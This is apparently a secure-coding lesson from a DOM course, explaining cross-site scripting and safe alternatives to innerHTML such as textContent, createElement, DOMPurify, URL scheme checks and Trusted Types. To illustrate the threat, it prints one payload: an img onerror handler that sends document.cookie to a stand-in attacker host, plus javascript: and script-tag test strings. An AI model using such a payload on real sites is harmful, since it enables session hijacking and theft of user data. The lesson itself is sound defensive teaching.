lesson 10

Sanitization and the XSS threat model

Why innerHTML with user data is dangerous, what an XSS attack actually does, and the safe alternatives.

~ 15 min read·lesson 10 of 10

You finished a course on the DOM. You know how to read it, change it, listen to it, and update it without breaking accessibility. The last skill is the one that keeps you out of incident reports: don't ship cross-site scripting holes.

Cross-site scripting (XSS) is the family of bugs where an attacker gets your page to run JavaScript they wrote. They do not need to break into your server; they only need to get your page to insert a string they control as if it were code. From there, your user is the victim: the attacker's code now runs inside their session.

The good news: the rule that prevents almost all of it is the same rule lesson 3 introduced. This lesson explains why that rule matters and what to do in the cases where you cannot follow it as-is.

What XSS actually does

Imagine your app shows a comment under each blog post. You read the comment text from a database and insert it into the page like this:

vulnerable.js

// DON'T:
const el = document.querySelector('.comment');
el.innerHTML = comment.text;

A friendly comment is just text and renders as text. Now suppose someone posts a comment whose content is:

payload.html

<img src="x" onerror="fetch('https://evil.example/steal?c=' + document.cookie)">

The browser parses that string as HTML. It builds a real <img> element. The src="x" does not point to a loadable image, so the load fails, and that triggers the onerror handler, which sends a request to the attacker's server with every cookie that script can read (any cookie not marked HttpOnly) in the query string. If the session cookie is among them, every visitor who reads that comment quietly hands over their session.

That is a complete XSS attack. The attacker did not touch your server. They typed text. Your page was the gun, their text was the bullet, and innerHTML pulled the trigger.

Other things attackers can do once they execute JavaScript in your page:

Read any data the user can read — emails, messages, account info — and send it elsewhere.
Make requests to your API as the logged-in user. Change passwords. Move money. Send messages.
Show a fake login form on your real domain to harvest credentials.

The rule of thumb for the threat model: if an attacker controls a string and your code parses it as HTML or JavaScript, the attacker now controls your page in the user's browser.

check your understanding

A username field allows arbitrary text. Your app shows the username on every page with nameEl.innerHTML = user.name. A user signs up with the name <script>alert(1)</script>. They reload the page. What happens?

The rule that prevents almost all of it

Almost every XSS bug fits the same shape: user-controlled string → parsed as HTML or JavaScript by your code. The rule that prevents almost all of those bugs is one line:

Use textContent for any string that touched user input. Reserve innerHTML for strings you wrote yourself.

If you only write text, an attacker can post <script> tags all day; you write the literal characters into a text node and the browser shows them as characters. There is no parser to trick.

The same rule extends to several lookalike methods:

element.innerHTML = userText — bad. Use textContent.
element.outerHTML = userText — bad. Same parser, more dangerous (replaces the element itself).
element.insertAdjacentHTML(pos, userText) — bad. Same parser.
document.write(userText) — bad, and write document.write out of your vocabulary altogether.
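<a href={userUrl}> where userUrl could be javascript:alert(1) is also bad. Parse the URL and allow only the schemes you expect (such as http: and https:); trying to strip javascript: out of the string is easy to bypass.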
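For the URL case in the last item above, a minimal sketch of scheme validation might look like this. The helper name toSafeHref, the ALLOWED_PROTOCOLS set, and the example.com base are assumptions made for illustration; they are not part of any library. The sketch leans on the standard URL constructor, which normalizes the input roughly the way the browser would before the scheme is checked.

```javascript
// Hypothetical helper: returns a normalized URL string, or null if the
// URL is unparseable or uses a scheme outside the allowlist.
// ALLOWED_PROTOCOLS is an assumption; adjust it to what your app needs.
const ALLOWED_PROTOCOLS = new Set(['http:', 'https:']);

function toSafeHref(userUrl, base = 'https://example.com/') {
  let parsed;
  try {
    // The URL constructor trims surrounding whitespace, removes tabs and
    // newlines, and lowercases the scheme, so disguised spellings of
    // "javascript:" end up with protocol === 'javascript:'.
    parsed = new URL(userUrl, base);
  } catch {
    return null; // not parseable as a URL at all
  }
  return ALLOWED_PROTOCOLS.has(parsed.protocol) ? parsed.href : null;
}
```

A caller would assign the result to href only when it is not null, and otherwise render the value as plain text or leave the link out.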

The safe equivalents:

Text into an element: element.textContent = userText.
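Build markup with user data inside: createElement for the structure, textContent for any user pieces, setAttribute (or properties) for attributes. Never put user data into event-handler attributes such as onclick, and validate it first for URL attributes such as href.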

safe.js

// Safe construction — no parsing of user input:
const li = document.createElement('li');
li.className = 'comment';

const author = document.createElement('strong');
author.textContent = comment.author;   // text node, attacker-proof

const body = document.createElement('span');
body.textContent = comment.text;       // text node, attacker-proof

li.append(author, ': ', body);
list.append(li);

Notice what happened. We built the structure ourselves with createElement, set the user-controlled parts as text, and the browser never parsed an attacker-controlled string. There is nowhere for an attack to land.

Tip

When you find yourself building an HTML string by concatenating user input with tags, stop. That is the exact shape that creates XSS bugs. Build the elements with createElement instead, and put the user input through textContent or attribute setters.

When you do need formatting

Sometimes you genuinely need to render user-supplied content with formatting. A comment that allows bold, italic, and links. A markdown editor. A rich-text field.

You have two safe paths.

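One, render through a format you control. If the user writes Markdown, convert it with a trusted Markdown library (server-side or in the browser) that is configured to escape or drop raw HTML in the input. Some Markdown libraries pass embedded HTML through by default, so check that setting, or sanitize the library's output. Done this way, the only tags in the result are ones the renderer wrote; the raw user input is never parsed as HTML.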
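To make path one concrete, here is a deliberately tiny sketch of the "escape everything, then emit only tags you wrote" idea. It is not Markdown and not a substitute for a maintained library; the function names escapeHtml and renderTinyMarkup and the two supported markers (**bold** and *italic*) are assumptions made for illustration.

```javascript
// Characters that could start or break out of HTML markup.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Step 1: turn every special character in the user's text into an entity,
// so nothing the user typed can be read as a tag or attribute.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Step 2: add formatting using only fixed tags that this code writes.
// The user's text is already escaped by the time the tags are added.
function renderTinyMarkup(source) {
  return escapeHtml(source)
    .replace(/\*\*(.+?)\*\*/g, '<strong>$1</strong>')
    .replace(/\*(.+?)\*/g, '<em>$1</em>');
}
```

The order matters: escaping first means the only angle brackets in the output are the ones in the fixed strong and em tags. This is the opposite of a regex that tries to remove dangerous patterns from HTML the user supplied.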

Two, sanitize. A sanitizer takes an HTML string and returns a stripped-down version with dangerous tags and attributes removed: no <script>, no onerror, no javascript: URLs. The standard pick is DOMPurify — a small, well-audited library that you call once per insertion.

purify.js

import DOMPurify from 'dompurify';

const clean = DOMPurify.sanitize(comment.html);
commentEl.innerHTML = clean;
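If comments should allow only a handful of tags, DOMPurify's ALLOWED_TAGS and ALLOWED_ATTR options let you narrow the output to an explicit allowlist. The sketch below is one way to wrap that; the sanitizeComment name and the particular tag list are assumptions, and the DOMPurify instance is passed in as a parameter so the wrapper stays independent of how your app imports it.

```javascript
// Assumption: this allowlist is illustrative. Pick the tags and
// attributes your product actually needs, and nothing more.
const COMMENT_SANITIZE_OPTIONS = {
  ALLOWED_TAGS: ['b', 'strong', 'i', 'em', 'a', 'p', 'br'],
  ALLOWED_ATTR: ['href'],
};

// `purifier` is expected to be the DOMPurify instance your app imports.
// Everything outside the allowlist is removed from the returned string.
function sanitizeComment(purifier, dirtyHtml) {
  return purifier.sanitize(dirtyHtml, COMMENT_SANITIZE_OPTIONS);
}
```

In the browser this would be used as commentEl.innerHTML = sanitizeComment(DOMPurify, comment.html).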

The wrong way to sanitize: write your own regex-based "remove <script> tags" function. The list of dangerous patterns is long, evolving, and full of obscure cases (data: URLs, SVG event handlers, mutation XSS via parser quirks). A proper sanitizer takes years of issues and patches to ship safely. Use DOMPurify; do not invent your own.

Watch out

Sanitize on the way in and on the way out, or be very clear about which one you do. Sanitizing only on save keeps your stored data clean, but anything that reaches storage by another path (an import script, an older endpoint, a bug) is still rendered unsanitized. Sanitizing on render is more defensive because it protects the sink no matter how the data arrived.

check your understanding

You need to show comments that include the user's bold, italic, and links. What's the safest pipeline?

Trusted Types in one paragraph

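Browsers that support a feature called Trusted Types let you ban raw strings from being assigned to dangerous sinks like innerHTML. You turn it on with a Content-Security-Policy header (the require-trusted-types-for 'script' directive); after that, only special "trusted" objects produced by an explicit policy can be assigned. That means a future bug that does innerHTML = userText does not silently work: in a supporting browser it throws a TypeError, and the violation can be sent to your CSP reporting endpoint. Chromium-based browsers have supported it for a long time; check current support in other engines, and treat it as a safety net on top of the rules above, not a replacement for them.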
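As a rough sketch of what an explicit policy looks like, the function below creates one whose createHTML rule runs a sanitizer. The function name createCommentPolicy and the policy name comment-html are assumptions; trustedTypes.createPolicy and the CSP directives in the comment are the standard API. The Trusted Types object and the sanitizer are passed in as parameters so the code also behaves sensibly where the feature is missing.

```javascript
// Response header that turns enforcement on (sent by your server):
//   Content-Security-Policy: require-trusted-types-for 'script'; trusted-types comment-html

// trustedTypesApi: window.trustedTypes in a supporting browser, else undefined.
// sanitizeHtml: a function such as (s) => DOMPurify.sanitize(s).
function createCommentPolicy(trustedTypesApi, sanitizeHtml) {
  if (!trustedTypesApi) {
    return null; // feature not available; the caller falls back to plain sanitizing
  }
  return trustedTypesApi.createPolicy('comment-html', {
    // Every string that becomes TrustedHTML passes through the sanitizer first.
    createHTML: (input) => sanitizeHtml(input),
  });
}
```

With enforcement on, commentEl.innerHTML = policy.createHTML(comment.html) is accepted, while assigning the raw string is rejected.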

You do not need this on day one. You need to know it exists, and that turning it on later is one of the cleanest ways to make sure no future code reintroduces the bug class. Look it up when you have time; it is worth the read.

A short checklist

The whole lesson, in five lines:

Default to textContent. It can never execute markup.
Reach for innerHTML only with strings you wrote yourself.
For rich user content, use a sanitizer like DOMPurify — never a hand-rolled regex.
Validate URLs that come from users before assigning to href. Allow only the schemes you expect, such as http: and https:, which rejects javascript:.
When in doubt, build with createElement and textContent. The browser never parses an attacker-controlled string.

check your understanding

You receive a string of HTML from an internal API that your team owns. The API was added by your team last sprint and only your team writes to it — but it serves customer-typed content. You want to render the HTML in a comment list. What is the safest pattern?

check your understanding

You spot this in code: anchor.href = profile.url, where profile.url came from a user signup. What is the smallest fix that closes a real attack?
